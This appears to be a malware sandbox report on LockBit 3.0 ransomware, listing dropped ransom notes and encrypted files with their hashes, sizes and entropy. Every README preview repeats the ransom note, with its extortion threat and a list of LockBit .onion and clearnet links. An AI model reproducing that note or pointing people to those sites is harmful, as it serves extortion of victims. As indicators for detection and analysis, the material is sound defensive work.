                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.980376397504934
                Encrypted:false
                SSDEEP:192:j/Uw34QHHyounn9hb65r7HINTHjyIGglC7U8Vh1k8QNl47AQmncmo:josyoun9hG5ANTu7HVYMAQX/
                MD5:D0B1BA343E6ACBD2DECAFEACFF41C313
                SHA1:9127C591B45BC4CC3AA935F2D8DCA5A60D49FCD1
                SHA-256:2283CBE8F0303A4CA9757BC5D4CA5CDBCAE97E4F39180E24EA72E731B177631A
                SHA-512:4A014813A19974C5D754BA1EE2CD6A36D80BE691C1C6781BBEAE94E7107AA4598B78155209FD22131A8F2F03BDCC8FA40DAE5607B43B0E63C032AB1249FB5067
                Malicious:false
                Preview:...r..?......s..q....Ww9Q.....9n......io...(..a.}t/O..b).u...:K.=#........p.1..e.........q..9...Yj.s..t.\o..u..[.[Dt,.|......x...-......). Q.E...CdA..a....;r..m.r...5..i=.C,.....2...1..q3..CK...../.P.7YM.g......p.'...........;..Le...U./R-`."...1.B...%.".?hL.MSX:W.9....w..>......-..].t.I._.....6..Y].DA...I.S.%..-I....[0....0,.c`.R.k.L.D......I.......R......gP;e!..&M.../..V.. 8./...R.[}4..+;...'.]y;...G.Yo...X..3.3.Q...;bP.......%.:.[ ..>hh$..Gik....:..w...P.6.P..j<..Y.. .[.......8. (.w.....r.y......t.....~.....x..w.4...}.|..!m..9.....L.\C....a1.42.#.a.J..3U.M.1.*....uA..%....<x.q...ia5..UG...4...M...O.9.[..N....)..w.............\..RX..8m...%d..._*M%. ..M..$...q.......q...nv......bH.".......-...."Y}p..N.~s[4%.(H \..A..Y.6...-.G2<.P@N....B.....5lC....>.O8..h...z..R$.i..@.~.YYcy}..d..n..Y...v.....).......I<..?q.O.2..-.Cm......|.>......Q:p4.7oo..z...d..l.i~.3..V...<R,..T9.V...a.~({.W.....l-..B....f...:..X..v.f(<.V.V..l..H<0..8m.y!t.*.......*...2

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.979006147123343
                Encrypted:false
                SSDEEP:192:Kird+3OUCowcD8/+Ri97631LjLUBAZs0cGyVeTzkeIOdqo:b8nw3+RkeFHLgAZAG20zkeIOdz
                MD5:AF57EA72319419E0B2904766EF65C9C3
                SHA1:681CF0A368A7FC6A473C6D1CCB07579AB40D14BC
                SHA-256:DCC6EA6F31F3C130C026DC69B59D33382251124C2600C52B62F02A6B0F3E3492
                SHA-512:E83F4D0E5AB4756D6B2DDC00F9C36F5C68FEF8D6460E3EDA861AED2519718E492EF4CB296453E7C420232825EFBB380899B5E6070113C06D7FAE97A5E29C3555
                Malicious:false
                Preview:...S..K.......=[8B..y.u.._h.......P..z.....|b.b..+D.E......u....A.v...Ly...q.>R.....X.f....700q...(._.\.$..G..a.@.....pb....)...3...s...E. .l.-........t...$..Z.5f.E.tu...._1u...x@...d~.....m..4.....e.......N}..]......E.9glZ8.^.9.M.....Z_.Q2`..s.....Z;ME...$H....x.Dm..Y.f...s..J.........v\<..U..p....2n.I.....l.".Z3..[..].y.&...4......D...@e.....A..?..E..\.0e.....T....L....j..ic..~@fm.....#.r.Yy.w...z.CQ..[L.....S..+S..-..Q..V......Y,@Dj...W.+.d..<...oj..z..Y0'..V...>P.]....F9...>...g....tL...U...<i..:..|.a....2..[Y&.SW...&!.....{j..#..I(=..#....k.J..'....UlN..+....V..?.^>9.0c..a>.L.C"........x..O).).H...'....P/..R...i........cbq. ..L....9e.9........Xt..........v4O.sY..,.r.k...U6.&...bI.Y.8....X.....&.c._.P..2...A@.4...`....M..3...~....@.9|...JG&...hjedx.d.e.sOi.../.x.8>.e-@Db}..M..&.d~..j[..`.i...t?8.RO.2..&N........w...f.B."fX...)N/.<....}._.e7...n...s....e......c.;...9L.2i..r.^(Ci..&V...D.........|...&&..-.t$.....r...@O>`J.k...`}.V........+..

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
